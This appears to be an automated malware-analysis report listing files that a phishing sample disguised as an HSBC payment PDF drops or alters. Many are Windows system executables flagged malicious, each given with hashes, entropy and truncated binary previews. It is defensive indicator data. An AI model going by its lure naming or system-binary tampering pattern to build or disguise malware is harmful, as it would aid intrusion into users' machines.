SSDEEP:	24576:vSEmYD6gjGPG45QVDkfX4lyTyr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:v5mYD6g2GWQVQfeyTkLNiXicJFFRGNzb
MD5:	04AD50141538721A7F15A8CCA9C67140
SHA1:	1FF3CC2CFF719CDCDF0E9A62514B4E698EF8A331
SHA-256:	B853A184D4084C4B4900643A2DAB936C72CEAC1FEAE3CC016F97A11E88E807AF
SHA-512:	C06E51E53EAA35EAD17D105FE7F7CBE2D2C1344BA5346F1780B9F4B5BC2331AF010DBEC00D52ED515F6E4968377E70F7E5B28C0989F758FA7A609E35AB782B72
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@....................................N..... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autF33C.tmp

Download File

Process:	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	65166
Entropy (8bit):	7.912398941148154
Encrypted:	false
SSDEEP:	1536:2P5ZvnmNXxIFgjVG/Oj6alKYzHqNON6gdWvHcyA/gGDX+aOjOocW:2XmNXc/u654HHrdWv8yCXCjsW
MD5:	CD3475A93B6C5D559A995299608F792B
SHA1:	5CCF5D83F1CF4B14C270949A37FFDD137B155B0C
SHA-256:	E819A16F8A4AC2ED11968D30E60AB847536D1D7D48BEDF8B80796155A41D3301
SHA-512:	AB058541DBAC67D89C4FB3FA373F2E09D3E209D7E257E471BE94FDB7F0EF53910913A914F298898D019D405D699215D375BDFFB9D3352800A38E508ABCEB2675
Malicious:	false
Preview:	EA06..n..C:SI.^mW...3...iY..fTy..G..jSj...V.M&...<.x......g ..d.x.R1..~.a..}.\.../..3z\.kD../3Y.j.8.].(..y!.L&..."...J+....K..-f?r..`..g.{..............6.....'.Y..g..2.0.b.4.].%...sM.....[Z..Z.6....s..M+4......h.)0..$..]..&t{......@....9..@<2.....\|W...t.=..4...v.5.....OS.T. ..BkW.U@.....s%.Q$39.......y..I..$.0....8..$...Z.I...-3Y............#`....k5... ...\..3....9..@...Z.2.f........=...J.awR.W.z.=...uM..* ......@.LU. ..p....`..N..K......F.<%..D8.h....`...(w.M.i>.....fsI...yy.N.8..h.-Z.p..k. ..e$.M.3>M2iY.....f..<.......}...\z..QB.B......P.M.U...6.[..z,.'...9T...e\.F.4].2.6.Z..Z..iQ.Ei.y.6.O.V.4.'b'G..`.).b.{.Tf.J.v.e...\|..Y..'2..f...."..f.F../.IMbo9......G2.....U3.T........U....N.O.U.4........v;..i....K...y...J.f.f..'..}..R.T.v:...4...{4.sO..u....8..h.{...j...`..".7..g...S.l....v....+^N.j...W...9...f.x..G..oW....V.[...(....g.x...E...<..n.?....Z]'9........k.Zk....q.i.x.&.......i2..6.<.x.T.zz.Bi4...+...M.I#T...%...x..<.C.Z,..L..9...

C:\Users\user\AppData\Local\Temp\drawlingly

Download File

Process:	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	93696
Entropy (8bit):	6.854908654440961
Encrypted:	false
SSDEEP:	1536:m1GOwtbXECse47k04p1DfA6iipqvBJdPk/ETC5rlPHkdcXe5JtUk:m8OmbDYfi2BPfTcl/9Xe6k
MD5:	86A3376808511C374A36233F8694E4B1
SHA1:	E6766D9C1AB298483A40DBBBD023030440136887
SHA-256:	FA5D638B8147085CFF38EB486B7034D536C39DBEA977AB321AD70EAAB9CC05BB
SHA-512:	80637A27A5304C7ECAC458F4ACFDBE7093943727DAB1A12EA0273FFEDA1185D64E6831CA030DABEBE25348B2F3033477E307D71A26CAFC4D1E263A07FA373DA9
Malicious:	false
Preview:	...47W6WK799..4Y.A2G89YGyER6RAYVB44W6WO799IO4YYA2G89YG9ER6RA.VB4:H.YO.0.h.5..`f/QJy7K5D3,y5#ZZ8Bw-R.K<!.07av.k.4(] \|;_K}VB44W6W.r99.N7Y.{G.89YG9ER6.A[WI5dW63N791IO4YYA<.99Yg9ER.SAYV.44w6WO599MO4YYA2G<9YG9ER6R.XVB64W6WO7;9..4YIA2W89YG)ER&RAYVB4$W6WO799IO4Y..3Gs9YG9.S6.DYVB44W6WO799IO4YYA2.99UG9ER6RAYVB44W6WO799IO4YYA2G89YG9ER6RAYVB44W6WO799IO4yYA:G89YG9ER6RAQvB4\|W6WO799IO4Yw5W?L9YG-'S6RaYVBP5W6UO799IO4YYA2G89yG9%\|D!3:VB4.R6WO.89II4YY'3G89YG9ER6RAYV.44..%[VZIO8YYA2.99YE9ERZSAYVB44W6WO799.O4.YA2G89YG9ER6RAYV..5W6WO7q9IO6Y\A.89..9EQ6RA.VB2T.6W.799IO4YYA2G89YG9ER6RAYVB44W6WO799IO4YYA2G89.:.J..(..44W6WO6;:MI<QYA2G89YGGER6.AYV.44W.WO7.9IOYYYA.G89'G9E,6RA=VB4FW6W.799.O4Y6A2GV9YGGER6LCqIB4>}.WM..9IE4s.2.G83.F9EVEpAY\.64W2$l793.L4Y]2.G83.C9EVEwAY\.14W2}.7:._I4YB..G83YD.PT6RZspB6.n6WE7..IL.L_A2\..YE.LR6Vk.%_44Q..O73M@O4[.K2G<.GE..R6Xk{(Q44S.We.G-IO0rYk.9-9YC.Ex.,WYVF.4}.)X79=bO._s#25.5Y7:*36RGq.B4>.vWO19.sOJWYA6EW.YG3cx.Ri.VB24.`WO19..O4_YifG8?YolER0RkcVjd4W0Wgf99OO..Y?.G8=u@GvR6VjO(s44S.Q77

C:\Users\user\AppData\Roaming\a0358cca38a50504.bin

Download File

Process:	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.983933834624014
Encrypted:	false
SSDEEP:	384:n67rJTnM6xp3T/QOlG20q/j0QBsg2wEPUgR32:n67rJTbz3T/RHvj0QBx2tPHB2
MD5:	E276371CA124DE5C7A2929EEBE6A5747
SHA1:	ADDE965E8CC7C11373D813CB306181A0CF4612DD
SHA-256:	47FE73D9AE641484DD621AB4FD9498E882EFC11EF3B81ED105718BFE279A5CCF
SHA-512:	28C6D307FCB458AF3A560A1100F20541F546B07DFA1D1CD8052495A646D91A6B7674FC7CC244DB6627DABB930DBE0BF2BAB0FEA8FC482AD6CC9C752601D9DFF5
Malicious:	false
Preview:	..,..\|..$j....ti.q..)..F...M.].....ls J.].yt=z}/.w..U.O0..;.u.F.....o...d.Aq..L..."....%}.`.H...h..S..:...1..v.aGo>...{n.....Wr!..^J....:.'......XARFDf..n\|.'F2%..9E......2Z3.)..(........d]N..s.+5......J.$.H.(.....\....lxUf..7+...w..G.b.`iI..\.@.X4.].% .....V...{..Y.L.d...~o...%sR.....#\....u..WA.n....[`O.7....d.1....%..l.}..........V....k........(.hEl.l...."..9...>fh#>.X:;...}..@x.'.7.........q_.T....o...e5%..H.\|.%.8b.T..v.~.\|.....U.Z.Uiz^h.t....=.......i8&$.c.Fs..........E ..A..9.q.R.":.....n..s..8.%4..G..K...'.....f.}`..H..!%.B%..5..CC3.Fe!.B......Y.....1.........B...1...7....O.Dlw....b...eJn.c..D230...p.v..7.J.......B.......%?.4JB.B.........Y.......$.H..&u...gF.#Wn.;.\.....j.Q.E..........}W6...4..A..Z.U7..YUPiP8.-..;.\|E.U..,.^I....,..VUe..O...B....\|.{.......%......&*=.....)..g.%.....i...\sx....)...tF[.......d..:g......G.z...53...G~`..3..sJ..eU..r..#A'..Y........O\k./..0=........NH.Rr..W.T.._.l=.S..&........."...RB5.KF.s....)..BE.j.,BT

C:\Windows\Logs\WindowsBackup\WBEngine.0.etl

Download File

Process:	C:\Windows\System32\wbengine.exe
File Type:	dBase III DBT, version number 0, next free block index 10240, 1st item "\331g\252Y"
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.964751800188641
Encrypted:	false
SSDEEP:	48:mzA/3tcRT+WQPqj/5MgP3PjPxP+xnaqkPjUZPT3+T8/55opsmsAs2sC1I:n/9cCPu5MRp3+TE1QI
MD5:	014DFC91E1E54D1737F736420B5BD871
SHA1:	B1B4405F7EAB4F8C70F4A8C9A5F73E41227A9E0F
SHA-256:	94DDAD47E1C5F785640EC93079B29CAD0E0A970D47EDF79C5D120E3D54E14630
SHA-512:	A2B603B543916F0C1B99500139024B7FEE90BC9784E1FE2F1288925A64393555C82653046D5DFF6583ED4B173F9492BE513749163127488F698FACAC8229D2C3
Malicious:	false
Preview:	.(..@...@...........................................!....................................g.Y.............(......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`..............9yM..........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P..........g.Y................................................................8.B..g.Y....19041.1.amd64fre.vb_release.191206-1406.....,.@..g.Y...............'"a.-....spp.pdb...........@..g.Y.....T.c..i.\.C.s"8@....vssvc.pdb......./.@..g.Y....W.p.D.......]....vssapi.pdb......-.@..g.Y.....\..Q....T*&.......udfs.pdb........0.@..g.Y......B..,`..9..4.....ifsutil.pdb.....-.@..g.Y....I:...S%9.`...'.R....uudf.pdb........1.@..g.Y...........1$OI"......wbengine.pdb................................

C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\a0358cca38a50504.bin

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.985439971886083
Encrypted:	false
SSDEEP:	384:222t/KwT9xrcwrGOGyyE0mompiBf8Kdnf+ra:X2/Tz3rZyE0mompM0Qf+ra
MD5:	0A7F21E834E1C704FB65EA0B998064EB
SHA1:	077CC3A252F7F050649F93DC31EADEEBBA87BE46
SHA-256:	5BEF3C80BE3952A7D6599C89AE95EA16BAD0E6156DB87FCB0AFA9E17D7557A48
SHA-512:	52AA7FD84A61E212EF77490770AA1024B367C981FB07DA67E51A2BB9A6A64CA5B83ADA90A97FC483449126CC6A0E5022CE7E04C6A27E106FD7009E652A8EE687
Malicious:	false
Preview:	...<.;W..6Q........l.d.../.....iEx`......U..f.p.....f......_.y..a8t...0z.V.ii!..=.O....(\.....q.........g.$...J.=...q.'q.8...E~u...}....$[..(c...'.Y..\2.3h.xS.<...%..U.K+U.........hYY....G'.q.E...}.n"...H..0#.6C..q..t.7.X....2.GGi.;.G.t..5j... t.;+2..U..F..=.........P.....:v,.J.M..........S..:{.....@....=Ky;0.dP'O...x..b.;...~.x\|......kU8...a?:....u\k..L[...}..{.f......Z.8.<$.V..H..6;.H......6..D>.`..ak....E.d'.-{]x.s.Z..`.e..$W.x{t.....P.w........`q...m.m.3St./. ....,...0\|'..W..Py..dH.....?..+'(.........k.>+M&.y.b.......#%m4qT6...\|..v....X.7.}.q.N.\"2 9..b..8....I;...A...Z..Y.dP........^.:.~].YK.6..2..4K.b..v'j..h>=..W..$.....p!z.6.....z.A..s...&xnJ.a.XC.W.#.J.a./p..@.......v+l8.....W./.Q.}.......6b..5n8."..G.D3.pk.]..5M..N.7\|3.%..1P...+......~.^J...lT.93X....D.......kpV.&..t...X.L...S,...Z..E./.d....U...3.u..V...U.J.8NJ. .u.Oe...,..p.]7`5.....;........`.A... /..ooLn..........R....,..J1..I...3.....O.,.n...~Y......,.......I...C.#..

C:\Windows\SysWOW64\perfhost.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1306624
Entropy (8bit):	4.538223667627093
Encrypted:	false
SSDEEP:	12288:5UiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:5+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	EE05579B3BCD384EA2133ED9493C415C
SHA1:	DF5B00B46DD88415D4D386D1F16E0DF6D05E99E2
SHA-256:	0F79414B25592F73D24118B5EE6736D0AE2BEA058357EA1B53F76B62D0A1FFFF
SHA-512:	C899FB10BD36EF865EB678C80A733510B63CE661760E64F2419C50160984A9FAD4B35EC2090CB609B5307E965E3224A6AFC01D3A7FA3FB146CF858B498FE33DD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@................................../........... ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...`...........P..............@...........................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\AgentService.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	6.967205276902701
Encrypted:	false
SSDEEP:	49152:rwVFr68Vw9wn/6h8p1zidvLNiXicJFFRGNzj3:rwVFrssCndv7wRGpj3
MD5:	51984CA1C81E28E32EC26F59E95B9523
SHA1:	95F9981CF8F3D0F7578B8A14E18B6ED8E7A33650
SHA-256:	7353D8AF51E75368FB1CFF21F455571C575625CB8D1FC9869D65C3769744B72E
SHA-512:	CB02BEBCAFF9EEB8E67E0FCC8D6EB6302EC06A7979038CD016F62BE8FFCA79A7F3C4370937CAD3938828E9E11D984FDF38E898A10687FE1D63849C65886E3A0B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@....................................F..... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

C:\Windows\System32\AppVClient.exe

Download File

Process:	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1348608
Entropy (8bit):	7.243427273559062
Encrypted:	false
SSDEEP:	24576:kQW4qoNUgslKNX0Ip0MgHCp+MBOuo/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kQW9BKNX0IPgi8MBOuoLNiXicJFFRGNf
MD5:	34E56361BAE3B41565C3D0351C9D6C12
SHA1:	77CC4EF5E65000549C0EC4E8967489B64D7B21D6
SHA-256:	F73F1C6004A5FAD7E8B930AF98B2661CD5EB1D2F5EC005BC600FA1041FEE88CD
SHA-512:	B326672878A1CCF031B05961FFDF9F4AB4565AFF2A6673EB6DFD3535979E1155D885AB4B764A08DEA20F6B84D0DB228B94D1788111459A36A0F25C9446D8B67A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@....................................i..... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Download File

Process:	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1379840
Entropy (8bit):	4.681771939121661
Encrypted:	false
SSDEEP:	24576:L2G7AbHjkn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:L2G7AbHjKLNiXicJFFRGNzj3
MD5:	E96F050E442226D3EE80F7D8B659CF12
SHA1:	9098231BA1BDEEB2426C679FAE60021A1AF40A0D
SHA-256:	6D93F1DB99FCC1ACF395BF78473946CFC4B70ED2ABA2F063C57ABC59B5D8F33C
SHA-512:	3AA159E5A67DE5F57CAE17328C86E642667CBF55D90F23FC1D7CA74F5F9C752CA15105CCA6686349D1FC66FDB2CAEC0F50293444EB904B428AF74B223ED1C0B2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.............................. .......... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...`...........n..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\FXSSVC.exe

Download File

Process:	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1242624
Entropy (8bit):	7.2802690365406075
Encrypted:	false
SSDEEP:	24576:xkdpSI+K3S/GWei+qNv2wG3//TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:x6SIGGWei2wG3/LNiXicJFFRGNzj3
MD5:	A325842411FFCF5AAC92F081FF80E1D4
SHA1:	37A09BE008BBE02119FC0A63B9D7D9104AAA84AC
SHA-256:	BFF82193A7C588659DDFC849548DDF653C17F4DD8257FCC89F90FB8C60525336
SHA-512:	AF71D4929412EC3B859CA491AD5634D007C2B66A6B3EBA0064D70720F301E22B78AE1CEEC97C4B83E2E239511EA6CF0476BD6164F78AEF8EBA9D44D9B7FE04CC
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...\|..}x...y..}x..}y.x\|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P.......;.... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

C:\Windows\System32\Locator.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1296896
Entropy (8bit):	4.515619264675689
Encrypted:	false
SSDEEP:	12288:gQiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:gC/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	167963C80DCE9EE0C951E410D8E5A3B4
SHA1:	29BF18B5C9625C3836B7360BFFA9A619960FC710
SHA-256:	9DEA58CB8EEF71864D2B081711A907F87CDD471FA04CFE7A6D036CE02717A0C4
SHA-512:	B9FC7B74FCA369734FCBEFF33860C274A552F02500E0D870F1ECC0707E3FB2DD7290F4F1886D3E25CF21E6C6BBA22AD03213E4FE078ACA1441120A92B5276444
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.....................................-.... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...`...`.......*..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\OpenSSH\ssh-agent.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1667072
Entropy (8bit):	4.823173876756676
Encrypted:	false
SSDEEP:	24576:9AL3UTx/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:9AL3UlLNiXicJFFRGNzj3
MD5:	4DC1351C4F632E1FA9AC4443DEC931B7
SHA1:	64D6DCCED3A5A514BD01D2F4BA426F51260ECAEA
SHA-256:	356972CF751B86D59E1608AD47CFF308B945A42691315EB5E04B1410A41F4FB2
SHA-512:	7CA43C12643FC7A7BBC2533A1F85F849F35F2A2EF5DA993AADFE5576939D0CD110AFFD827467EC62F9F6F5DF8074FDB4B3BBBC3C66DADB4C0EBE0ACFDEB974E0
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D\|.%...%...%...C...%...C...%...C..{%.....%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@..............................%........... ......................................................... ..x.......T...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...`...0......................@...........................................................................................................................................................................................................................

C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1391616
Entropy (8bit):	4.703250833333387
Encrypted:	false
SSDEEP:	24576:GOF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:GOFLNiXicJFFRGNzj3
MD5:	DCA53E9AFA3D477DCEA94893FAEAD38A
SHA1:	BACF2C8BA8350B103A44DCEB23F32D983C174999
SHA-256:	FDA0C103B51A3F1E380C541118CF6E24C26313BE4507877ED5C3AB8A405CF389
SHA-512:	0B2DE499341997C8756666515024EF6F3008BAECA50BB67008E40F485E7DEDF96D52D13670BA295ADA682EBE8FAC2B48BE049E62719BE121850A347E7DD1A6F5
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@............................. .....{..... .......... ......................................Xq..........x............................S..T...................(..(....)..............P...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................................................................

C:\Windows\System32\SearchIndexer.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1513984
Entropy (8bit):	7.094186766421581
Encrypted:	false
SSDEEP:	24576:Y3frCoQ9tLsiLPLe24CxruW4bIhllx/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Y3fIsIPLkCNuVbIhDxLNiXicJFFRGNzb
MD5:	80C30823A96018A3EDD1AB52D448DA70
SHA1:	A488DC9A2FCC9990C8588208F714387801B96EE7
SHA-256:	CCEC2F610D017276844C25F9F801AF8359EE38C09784832704D94C7A5AC69087
SHA-512:	D845E387F6236EECEDFFAD682EA0285391B33A4EA46A686C607A74B379A147CEA41457EE051594FB4E9DB14C153F122B2EF70B98FE8C0F9CBA31BC28E46A2504
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@.......................................... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................

C:\Windows\System32\SensorDataService.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1846784
Entropy (8bit):	6.9327216779338
Encrypted:	false
SSDEEP:	49152:ZF2YuHNETovAvNYf8kmOLNiXicJFFRGNzj3:M6BCf8kF7wRGpj3
MD5:	57FD8C7B7D17330D14DD1A4143FE9F84
SHA1:	AB174631A6310F9B4EE698E97343BD30318F9438
SHA-256:	DC722407F6500E453FA68C4C9B396424C6CF8C06E160C6C41031E03FEFE241D2
SHA-512:	5726EB0390560B5300026B593509D6C140F177EA0B86FF63783970ED19DF5CB2AF5C3956E42AC0E81D0FC2104E89C9AA2854955666D10E16E8DB5D68575A31D1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p.......B.... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\Spectrum.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1455616
Entropy (8bit):	7.230999178107825
Encrypted:	false
SSDEEP:	24576:YiW6ZvAKF5i/dN9Bde9j9Trk+FF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:YYxF50b9Bdu9TxnLNiXicJFFRGNzj3
MD5:	0D216484D64532FCD0E321859356E63D
SHA1:	3296BBEBED213A59A4A63FF43DCEB7C238182EEB
SHA-256:	401580888BEE1D6C43FE0073FFE68028A9636CB3600EDA6FE24DC5FB6846E362
SHA-512:	DE1EA4DBFD0CFB388649FBEED8680F378D920666E92F5BFB2CDB749CBD97D427E2AE82FDF5C2366A904767DB245FA87E9561A384FAE4AAF5C1A7DA7D2338EA57
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...{..4...{..=...>...+...{..9...{..V...{......{n.?...{l.?...{..?...Rich>...........PE..d...)ew..........."................. ~.........@.......................................... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

C:\Windows\System32\TieringEngineService.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1611264
Entropy (8bit):	5.048875299121239
Encrypted:	false
SSDEEP:	24576:uJnJ5D3WXA/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:uJnJ5DGXALNiXicJFFRGNzj3
MD5:	A32E6301A086F4E2862EB5068342DBA7
SHA1:	0CFF9F6B2CB24F48F742C492D4DBBF9FD08F7369
SHA-256:	3637155DA8A094324FAFC448B1F70D3502B22924545514C1BDC2EF5280A415CC
SHA-512:	620E15463EEA1B8FA9A51AE8342EFA441EF76995C198EB81D89201E98F2DD91EA3BB72729FCF31E7DF57600E12E6E3E6451CD6681DC34428827B6C4166D646E8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@..............................#........... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...\|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...`...0......................@...................................................................................................................................................................................................................

C:\Windows\System32\VSSVC.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2075136
Entropy (8bit):	6.729890010694136
Encrypted:	false
SSDEEP:	49152:vPK8mJYTerDjfJ2313e1mP1MdnUbLNiXicJFFRGNzj3:D7wRGpj3
MD5:	B24DBC62B4C97CB2007951B5F7A163BA
SHA1:	26D229D481BAD3094B1C6A52EF44EF8036891CAB
SHA-256:	19961D9E948A67EF93F4B11DA8FD698A2515346069163E8811913EDAE6473F92
SHA-512:	857C24C01CEFE08A44AB641C1279055EC9636D4C45878308E5FA817C3AA22AD87656B0D62D75AE6F14F2158AF9DB04524DDF6F92D7754A55978856A7F99A76BE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. ........... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`\|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................

C:\Windows\System32\alg.exe

Download File

